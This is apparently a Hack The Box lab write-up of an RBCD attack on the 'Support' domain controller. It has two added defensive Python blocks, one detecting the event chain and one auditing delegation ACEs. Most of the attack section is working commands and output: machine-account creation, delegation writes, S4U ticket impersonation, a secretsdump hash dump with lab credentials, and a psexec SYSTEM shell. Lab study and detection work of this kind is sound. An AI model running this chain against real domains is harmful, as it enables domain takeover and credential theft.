RBCD (Resource-based Constrained Delegation) Attack


The target domain contains a critical misconfiguration: a domain user has been granted transitive GenericAll access over the DC$ host, which opens the way to a Resource-based Constrained Delegation attack.

Local (PowerView.ps1 and Powermad.ps1)


*Evil-WinRM* PS C:\Users\support\Documents> New-MachineAccount -MachineAccount attackersystem -Password $(ConvertTo-SecureString 'Summer2018!' -AsPlainText -Force)
[+] Machine account attackersystem added

Since there isn't any account with a configured SPN that I control, I first leverage the default SeMachineAccountPrivilege to create a domain computer object, attackersystem$:Summer2018!, via Powermad's New-MachineAccount cmdlet.

*Evil-WinRM* PS C:\Users\support\Documents> $ComputerSid = Get-DomainComputer attackersystem -Properties objectsid | Select -Expand objectsid
 
*Evil-WinRM* PS C:\Users\support\Documents> $ComputerSid
S-1-5-21-1677581083-3380853377-188903654-5101

Then, I use PowerView's Get-DomainComputer cmdlet to retrieve and store the SID of the newly created computer object (attackersystem$).

Arbitrary ACE with SID


*Evil-WinRM* PS C:\Users\support\Documents> $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))" ; $SDBytes = New-Object byte[] ($SD.BinaryLength) ; $SD.GetBinaryForm($SDBytes, 0)

Next, an ACE granting full rights to the SID of the newly created computer object (attackersystem$) is built and serialized to its binary form. This DACL becomes the SD (security descriptor) that will be stored on the target object (DC$).

Delegation


*Evil-WinRM* PS C:\Users\support\Documents> Get-DomainComputer DC | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}

Lastly, the msDS-AllowedToActOnBehalfOfOtherIdentity attribute of the target object (DC$) is set to the security descriptor built above; the GenericAll right over DC$ is what permits this write.

Impersonation


Now I just need to request a service ticket for the DC$ host as the newly created computer account (attackersystem$), using the delegation right granted above. First, I enumerate the SPNs registered on DC$:

┌──(kali㉿kali)-[~/archive/htb/labs/support]
└─$ bloodyAD -d SUPPORT.HTB -u 'attackersystem$' -p 'Summer2018!' --host dc.support.htb get object 'CN=DC,OU=DOMAIN CONTROLLERS,DC=SUPPORT,DC=HTB' --attr servicePrincipalName 
 
distinguishedname: CN=DC,OU=DOMAIN CONTROLLERS,DC=SUPPORT,DC=HTB
serviceprincipalname: Dfsr-12F9A27C-BF97-4787-9364-D31B6C55EB04/dc.support.htb; ldap/dc.support.htb/ForestDnsZones.support.htb; ldap/dc.support.htb/DomainDnsZones.support.htb; DNS/dc.support.htb; GC/dc.support.htb/support.htb; RestrictedKrbHost/dc.support.htb; RestrictedKrbHost/DC; RPC/290156e5-22cb-4f1b-9b96-5516d84c363c._msdcs.support.htb; HOST/DC/SUPPORT; HOST/dc.support.htb/SUPPORT; HOST/DC; HOST/dc.support.htb; HOST/dc.support.htb/support.htb; E3514235-4B06-11D1-AB04-00C04FC2DCD2/290156e5-22cb-4f1b-9b96-5516d84c363c/support.htb; ldap/DC/SUPPORT; ldap/290156e5-22cb-4f1b-9b96-5516d84c363c._msdcs.support.htb; ldap/dc.support.htb/SUPPORT; ldap/DC; ldap/dc.support.htb; ldap/dc.support.htb/support.htb

There are a lot of SPNs to choose from; I will go with the generic ldap/dc.support.htb SPN.

┌──(kali㉿kali)-[~/archive/htb/labs/support]
└─$ impacket-getST 'support.htb/attackersystem$' -spn 'ldap/dc.support.htb' -impersonate administrator -dc-ip $IP
Impacket v0.11.0 - Copyright 2023 Fortra
 
Password: Summer2018!
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating administrator
[*] 	Requesting S4U2self
[*] 	Requesting S4U2Proxy
[*] Saving ticket in administrator.ccache

Impersonation complete. Service ticket saved
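As an added detection-side example (not part of the original writeup), the function below correlates the three observable stages of this chain in Windows Security events: computer account creation (Event ID 4741), a write to msDS-AllowedToActOnBehalfOfOtherIdentity on a domain controller (Event ID 5136, which requires directory service change auditing to be enabled), and a service-ticket request carrying transited services, the fingerprint of S4U2Proxy (Event ID 4769). The sample events are constructed to mirror this writeup's steps, and the one-hour correlation window is an assumption.

```python
RBCD_ATTR = "msds-allowedtoactonbehalfofotheridentity"

# Constructed sample events mirroring this writeup's chain (not real log data).
# Keys follow the EventData field names of the Windows Security log; Time is
# seconds since an arbitrary epoch to keep the example self-contained.
SAMPLE_EVENTS = [
    {"EventID": 4741, "Time": 100, "SubjectUserName": "support",
     "TargetUserName": "attackersystem$"},
    {"EventID": 5136, "Time": 160, "SubjectUserName": "support",
     "ObjectDN": "CN=DC,OU=Domain Controllers,DC=support,DC=htb",
     "AttributeLDAPDisplayName": "msDS-AllowedToActOnBehalfOfOtherIdentity"},
    {"EventID": 4769, "Time": 220, "TargetUserName": "administrator@SUPPORT.HTB",
     "ServiceName": "DC$", "TransmittedServices": "attackersystem$@SUPPORT.HTB"},
    # Ordinary service-ticket request with no transited services: no alert.
    {"EventID": 4769, "Time": 230, "TargetUserName": "west.laura@SUPPORT.HTB",
     "ServiceName": "DC$", "TransmittedServices": ""},
]


def detect_rbcd_chain(events, window=3600):
    """Return (stage, subject, detail) alerts for an RBCD chain against a DC.
    A bare 4741 is not alerted (machine joins are routine); it is remembered so
    the later stages can be tied back to whoever created the account."""
    alerts = []
    created = {}  # new computer account (lower-case) -> (creator, time)
    for e in sorted(events, key=lambda ev: ev["Time"]):
        eid = e["EventID"]
        if eid == 4741:
            created[e["TargetUserName"].lower()] = (e["SubjectUserName"], e["Time"])
        elif eid == 5136 and e.get("AttributeLDAPDisplayName", "").lower() == RBCD_ATTR:
            subj, dn = e["SubjectUserName"], e["ObjectDN"]
            if "ou=domain controllers" in dn.lower():
                alerts.append(("rbcd_write_on_dc", subj, dn))
            for name, (creator, t) in created.items():
                if creator == subj and 0 <= e["Time"] - t <= window:
                    alerts.append(("create_then_rbcd", subj, name))
        elif eid == 4769 and e.get("TransmittedServices"):
            # TransmittedServices names the account that delegated (S4U2Proxy).
            delegator = e["TransmittedServices"].split("@")[0].lower()
            if delegator in created:
                alerts.append(("s4u2proxy_from_new_account", delegator,
                               f"{e['TargetUserName']} -> {e['ServiceName']}"))
    return alerts
```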

Hashdump


┌──(kali㉿kali)-[~/archive/htb/labs/support]
└─$ KRB5CCNAME=administrator.ccache impacket-secretsdump support.htb/@dc.support.htb -no-pass -k -dc-ip $IP      
Impacket v0.11.0 - Copyright 2023 Fortra
 
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xf678b2597ade18d88784ee424ddc0d1a
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:bb06cbc02b39abeddd1335bc30b19e26:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
SUPPORT\DC$:aad3b435b51404eeaad3b435b51404ee:d3430dfec60242257afcc1fff6f43906:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x5f39b9187072640dd3b9ebc53cdcbd2cda166279
dpapi_userkey:0xc98d4a2ff3c17181eaaad459d6383cff7c72bc2d
[*] NL$KM 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[*] Kerberos keys grabbed
[*] Cleaning up... 
[*] Stopping service RemoteRegistry

Domain Level Compromise

Remote (Impacket)


┌──(kali㉿kali)-[~/archive/htb/labs/support]
└─$ KRB5CCNAME=support@dc.support.htb.ccache impacket-addcomputer 'SUPPORT.HTB/@dc.support.htb' -no-pass -k -computer-name 'blah$' -computer-pass 'Qwer1234' -dc-host dc.support.htb
Impacket v0.11.0 - Copyright 2023 Fortra
 
[-] SMB SessionError: STATUS_MORE_PROCESSING_REQUIRED({Still Busy} The specified I/O request packet (IRP) cannot be disposed of because the I/O operation is not complete.)
SMB SessionError: STATUS_INVALID_PARAMETER(An invalid parameter was passed to a service or function.)
 
 
┌──(kali㉿kali)-[~/archive/htb/labs/support]
└─$ impacket-addcomputer 'support.htb/support:Ironside47pleasure40Watchful' -computer-name 'blah$' -computer-pass 'Qwer1234' -dc-ip $IP
Impacket v0.11.0 - Copyright 2023 Fortra
 
[*] Successfully added machine account blah$ with password Qwer1234.

Adding a computer object, blah$:Qwer1234, from the attacking host. The initial attempt, Kerberos authentication with the TGT of the support account, failed with the SMB error shown; the same command worked with regular NTLM (password) authentication.

Arbitrary ACE with the SID and Delegation


┌──(kali㉿kali)-[~/archive/htb/labs/support]
└─$ KRB5CCNAME=support@dc.support.htb.ccache impacket-rbcd 'support.htb/' -no-pass -k -delegate-from 'blah$' -delegate-to 'DC$' -action write -dc-ip $IP             
Impacket v0.11.0 - Copyright 2023 Fortra
 
[*] Accounts allowed to act on behalf of other identity:
[*]     attackersystem$   (S-1-5-21-1677581083-3380853377-188903654-5101)
[*] Delegation rights modified successfully!
[*] blah$ can now impersonate users on DC$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*]     attackersystem$   (S-1-5-21-1677581083-3380853377-188903654-5101)
[*]     blah$        (S-1-5-21-1677581083-3380853377-188903654-5102)

The command above writes the SID of the newly created blah$ account into the msDS-AllowedToActOnBehalfOfOtherIdentity attribute of the DC$ host, alongside the attackersystem$ entry left by the local exploit.

Confirmation


┌──(kali㉿kali)-[~/archive/htb/labs/support]
└─$ bloodyAD -d SUPPORT.HTB -u 'blah$' -p 'Qwer1234' --host dc.support.htb get object 'CN=DC,OU=DOMAIN CONTROLLERS,DC=SUPPORT,DC=HTB' --attr msDS-AllowedToActOnBehalfOfOtherIdentity
 
distinguishedname: CN=DC,OU=DOMAIN CONTROLLERS,DC=SUPPORT,DC=HTB
msds-allowedtoactonbehalfofotheridentity: O:S-1-5-32-544D:(A;;0xf01ff;;;S-1-5-21-1677581083-3380853377-188903654-5101)(A;;0xf01ff;;;S-1-5-21-1677581083-3380853377-188903654-5102)

This can be checked for confirmation. Querying the msDS-AllowedToActOnBehalfOfOtherIdentity attribute of the DC$ host now shows two ACE entries:

  • A;;0xf01ff;;;S-1-5-21-1677581083-3380853377-188903654-5101: the attackersystem$ account from the local exploit earlier
  • A;;0xf01ff;;;S-1-5-21-1677581083-3380853377-188903654-5102: the newly created blah$ account
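As an added defender-side example (not part of the original writeup), the following Python decodes the SDDL stored in msDS-AllowedToActOnBehalfOfOtherIdentity and lists the trustee SIDs allowed to act on behalf of the object, which is how an audit would catch both entries above. It also shows why the confirmation query prints 0xf01ff: that is exactly the mask spelled out by the rights string CCDCLCSWRPWPDTLOCRSDRCWDWO used when the ACE was built. The approved-SID allow-list passed to the audit helper is an assumption.

```python
import re

# Standard SDDL rights codes and their access-mask bits (CC=Create Child,
# DC=Delete Child, LC=List Children, SW=Self Write, RP=Read Property,
# WP=Write Property, DT=Delete Tree, LO=List Object, CR=Control Access,
# SD=Delete, RC=Read Control, WD=Write DACL, WO=Write Owner).
SDDL_RIGHTS = {
    "CC": 0x00001, "DC": 0x00002, "LC": 0x00004, "SW": 0x00008,
    "RP": 0x00010, "WP": 0x00020, "DT": 0x00040, "LO": 0x00080,
    "CR": 0x00100, "SD": 0x10000, "RC": 0x20000, "WD": 0x40000,
    "WO": 0x80000,
}

# Attribute value of DC$ as returned by the confirmation query in this writeup.
DC_SDDL = ("O:S-1-5-32-544D:(A;;0xf01ff;;;S-1-5-21-1677581083-3380853377-188903654-5101)"
           "(A;;0xf01ff;;;S-1-5-21-1677581083-3380853377-188903654-5102)")


def rights_to_mask(rights: str) -> int:
    """Convert an SDDL rights field (hex literal or run of two-letter codes) to a mask."""
    if rights.lower().startswith("0x"):
        return int(rights, 16)
    return sum(SDDL_RIGHTS[rights[i:i + 2]] for i in range(0, len(rights), 2))


def parse_allowed_to_act(sddl: str) -> list[dict]:
    """Return one record per ACE in the DACL of an SDDL string.
    Each ACE is written (type;flags;rights;object_guid;inherit_guid;sid)."""
    m = re.search(r"D:[A-Z]*((?:\([^)]*\))+)", sddl)
    if not m:
        return []
    aces = []
    for body in re.findall(r"\(([^)]*)\)", m.group(1)):
        ace_type, _flags, rights, _obj, _inh, sid = body.split(";")[:6]
        aces.append({"type": ace_type, "mask": rights_to_mask(rights), "sid": sid})
    return aces


def audit_delegators(sddl: str, approved_sids: set[str]) -> list[str]:
    """Trustee SIDs holding an Allow ACE that are not on the approved list.
    Every SID returned can obtain service tickets to this host via S4U2Proxy."""
    return [a["sid"] for a in parse_allowed_to_act(sddl)
            if a["type"] == "A" and a["sid"] not in approved_sids]
```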

Service Ticket (Impersonate)


┌──(kali㉿kali)-[~/archive/htb/labs/support]
└─$ impacket-getST 'support.htb/blah$' -spn 'DNS/dc.support.htb' -impersonate administrator -dc-ip $IP       
Impacket v0.11.0 - Copyright 2023 Fortra
 
Password: Qwer1234
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating administrator
[*] 	Requesting S4U2self
[*] 	Requesting S4U2Proxy
[*] Saving ticket in administrator.ccache

Impersonation complete. Service ticket saved

Shell Drop


┌──(kali㉿kali)-[~/archive/htb/labs/support]
└─$ KRB5CCNAME=administrator.ccache impacket-psexec support.htb/@dc.support.htb -no-pass -k -dc-ip $IP     
Impacket v0.11.0 - Copyright 2023 Fortra
 
[*] Requesting shares on dc.support.htb.....
[*] Found writable share ADMIN$
[*] Uploading file nGZadwgL.exe
[*] Opening SVCManager on dc.support.htb.....
[*] Creating service QetT on dc.support.htb.....
[*] Starting service QetT.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.20348.859]
(c) Microsoft Corporation. All rights reserved.
 
c:\Windows\system32> whoami
nt authority\system
 
c:\Windows\system32> hostname
dc
 
c:\Windows\system32> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0:
 
   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . : 10.10.11.174
   Subnet Mask . . . . . . . . . . . : 255.255.254.0
   Default Gateway . . . . . . . . . : 10.10.10.2

System Level Compromise